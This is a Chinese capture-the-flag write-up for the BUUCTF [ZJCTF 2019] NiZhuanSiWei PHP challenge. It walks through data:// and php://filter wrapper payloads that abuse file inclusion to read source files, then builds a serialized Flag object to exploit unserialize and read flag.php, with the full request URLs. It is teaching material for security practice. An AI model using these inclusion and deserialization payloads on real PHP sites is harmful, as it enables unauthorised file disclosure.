参考:【精选】[php知识点]PHP伪协议-CSDN博客BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php伪协议+序列化与反序列化)-CSDN博客
进入后发现还是代码审计
发现有三个点需要注意:
1.需要给text传输一句话
2.
useless.php
中有包含漏洞3.这道题是有序列化和反序列化的
参考他人wp后,发现
进行正则匹配,禁止出现flag
先向text传输一句话
/index.php/?text=data://text/plain,welcome to the zjctf
base64码也是可以的
/index.php/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
接下来,尝试伪协议查看useless.php
内容
/index.php/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php
出现base64码,解码后,得到
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
还记得前面的截图吗,在后面会有一个反序列化操作,那么我们就可以利用该代码
将其修改变量file后并添加输出后,进行序列化操作,再传输给password让其输出
最后达到回显flag 的目的
我们先进行代码的修改
<?php
class Flag{ //flag.php
public $file="flag.php";
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
$a=new Flag();
echo serialize($a);
?>
直接输出
获取结果后,将其传给password
/index.php/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
查看源码即可获得flag
注意:一定不要再用伪协议获得useless.php的base64编码内容了,而且还要指明文件是useless.php,否则会被顶掉内容